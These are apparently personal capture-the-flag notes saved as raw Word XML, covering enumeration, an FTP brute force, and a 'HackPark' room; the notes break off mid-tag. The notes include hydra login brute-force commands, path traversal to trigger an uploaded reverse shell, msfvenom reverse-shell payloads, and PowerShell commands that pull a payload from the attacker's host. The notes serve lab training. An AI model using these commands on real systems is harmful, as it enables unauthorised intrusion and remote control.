    <w:p w14:paraId="61C045F3" w14:textId="3D0CD3B4" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30227E5A" w14:textId="5C1CD1A1" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A2F03E" w14:textId="0B0CE402" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0893CDD6" w14:textId="5E139E16" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A48769" w14:textId="66570D36" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitaiton – User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A2AE6E" w14:textId="0FAD94DD" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>User-Agent Switcher extension in browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1134A68C" w14:textId="6F87D294" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change user-agent input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A664B6" w14:textId="2E808BE0" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>trying various credentials or credentials indicated by additional enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1482DA42" w14:textId="4E968216" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>BurpSuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0969B8" w14:textId="31F66130" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can also change user-agent input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FB4248" w14:textId="2D5F1A39" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347DBAD3" w14:textId="17096BB5" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can also be used to achieve this goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73685442" w14:textId="2C8BEA40" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation – Weak Credentials for Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA67723" w14:textId="1E76657B" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1FF2A1" w14:textId="187D32F0" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00583FE3">
        <w:t xml:space="preserve">hydra -t </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;thread count&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00583FE3">
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;user&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00583FE3">
        <w:t xml:space="preserve"> -P /usr/share/wordlists/rockyou.txt -vV </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00583FE3">
        <w:t xml:space="preserve"> ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1617D3B1" w14:textId="1C599FE2" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>download useful files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35575A46" w14:textId="2DAF3CFE" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C39A2A" w14:textId="4B5E3CB6" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>binwalk saved files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794BFCD0" w14:textId="17AAB095" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>file &lt;filename&gt; command also</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A44FFED" w14:textId="4CCE676F" w:rsidR="00583FE3" w:rsidRDefault="00583FE3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">zip2john </w:t>
      </w:r>
      <w:r w:rsidR="001A15CC">
        <w:t>saved files with passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2562F540" w14:textId="7BE9E989" w:rsidR="001A15CC" w:rsidRDefault="001A15CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>steghide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B11525" w14:textId="3C32FDEC" w:rsidR="001A15CC" w:rsidRDefault="001A15CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B440E85" w14:textId="656B2352" w:rsidR="001A15CC" w:rsidRDefault="001A15CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>file pulling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A36F9DF" w14:textId="47915250" w:rsidR="001A15CC" w:rsidRDefault="001A15CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>scp &lt;user&gt;@&lt;IP&gt;:/path/to/file.ext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0FACBE" w14:textId="2E8D24AF" w:rsidR="001A15CC" w:rsidRDefault="001A15CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C507DE" w14:textId="0E72D55C" w:rsidR="001A15CC" w:rsidRDefault="001A15CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666FEC35" w14:textId="582B3F59" w:rsidR="001A15CC" w:rsidRDefault="001A15CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>linpeas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A1CFD" w14:textId="1E32EA76" w:rsidR="001A15CC" w:rsidRDefault="001A15CC" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22597DA2" w14:textId="6F4ED111" w:rsidR="001A15CC" w:rsidRDefault="001A15CC" w:rsidP="001A15CC">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BF5C7C" w14:textId="7DB683D2" w:rsidR="001A15CC" w:rsidRDefault="00A87301" w:rsidP="001A15CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HackPark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC108A" w14:textId="73CC2C76" w:rsidR="00A87301" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Recon and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD29E67" w14:textId="5396AA2E" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560B9A2D" w14:textId="4636E42A" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DBF400" w14:textId="53A1EB01" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Brute Force Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C161FB" w14:textId="09135A1E" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3C6E5" w14:textId="77777777" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.79.241  http-post-form "/Account/login.aspx:__VIEWSTATE=ScTUsDEL61RxXQbUkxPIvjWwWIPtRoGua7</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VlvlhkXMv83IlH8nDZNBJap5qDDRHYpohgQkDHiy%2FBC%2BxgOpa%2BQyclcuurGR6oEQrtrgMMab51BRVITHbw51etTYHg%2BOSqlTEdhO1sq6LyFJ6OiiTP6d9DJf02wqbnAd2tPNuj2XvUivov&amp;__EVENTVALIDATION=IwDYcG9QBNf8p2xPKx%2B%2Fw5JxMDpBvm8H7wN1ksA5dw9A8UBpnwOCo0Dw%2BPk5zNJmkB9lQ%2FliisMfMuMuK0XXTqgvEqLeivDFKIVc5TL58r9bwhfN6No%2FVNcCXAAYsaZZOdkMyqjZVNaOltsfMh1u4e0p9aFSTmWecZYwxusByDyG%2FSae&amp;ctl00%24MainContent%24LoginUser%24UserName=^USER^&amp;ctl00%24MainContent%24LoginUser%24Password=^PASS^&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -t 64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D81F2D1" w14:textId="77777777" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> [80][http-post-form] host: 10.10.79.241   login: admin   password: ******</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674E6B2" w14:textId="022627EC" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 1 of 1 target successfully completed, 1 valid password found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD63159" w14:textId="3475831B" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B336A38" w14:textId="2FC42EB2" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Versioning Detection and Research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144031F1" w14:textId="4AD691E3" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CMS version </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA162DA" w14:textId="4BEB49CD" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7B0AF3" w14:textId="23B9493E" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>File Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502CE4C5" w14:textId="411315D6" w:rsidR="00EE0AD3" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">edit posts </w:t>
      </w:r>
      <w:r w:rsidR="00EE0AD3">
        <w:t>with file folder icon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F04ACA7" w14:textId="143980AC" w:rsidR="00BF795A" w:rsidRDefault="00BF795A" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reverse Shell nc listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D09F65C" w14:textId="2B4CDEFE" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>activate shell by navigation to uploaded file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F138C71" w14:textId="5FF7E4D5" w:rsidR="00EE0AD3" w:rsidRDefault="007A6E65" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink w:history="1">
        <w:r w:rsidR="00EE0AD3" w:rsidRPr="00DB3027">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;/?theme=../../App_Data/files</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4412AF3F" w14:textId="09B19357" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Stabilize Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6E34C9" w14:textId="5A6ADBCC" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create msfvenom payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507EF734" w14:textId="2A1A0BD5" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;ip&gt; LPORT=&lt;port&gt; -f exe &gt; shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4444A4E6" w14:textId="5C5DDBF0" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB602E" w14:textId="32871F54" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A254B0">
        <w:t>msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=[your_ip] LPORT=[listening_port] -f exe -o [shell_name.exe]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C59491" w14:textId="669E1013" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>retrieve payload via powershell onto victim machine from attacker python -m SimpleHTTPServer 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DB9CF7" w14:textId="04C9B934" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">powershell Invoke-WebRequest -Uri </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00DB3027">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;IP&gt;/shell.exe -Outfile shell.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49D2B1A5" w14:textId="7E9E30D1" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>or in C:\Windows\Temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C3B791" w14:textId="00580DD0" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A254B0">
        <w:t>powershell "(New-Object System.Net.WebClient).Downloadfile('http://[your_ip]:[listening_port]/[shell_name.exe]')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1222A6BB" w14:textId="4739E4F8" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Create Metasploit listener and wait for connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1311E20D" w14:textId="232BDE30" w:rsidR="00EE0AD3" w:rsidRDefault="00EE0AD3" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F79241" w14:textId="1C6B8D53" w:rsidR="00A254B0" w:rsidRDefault="00A254B0" w:rsidP="0011412C">
      <w:pPr>
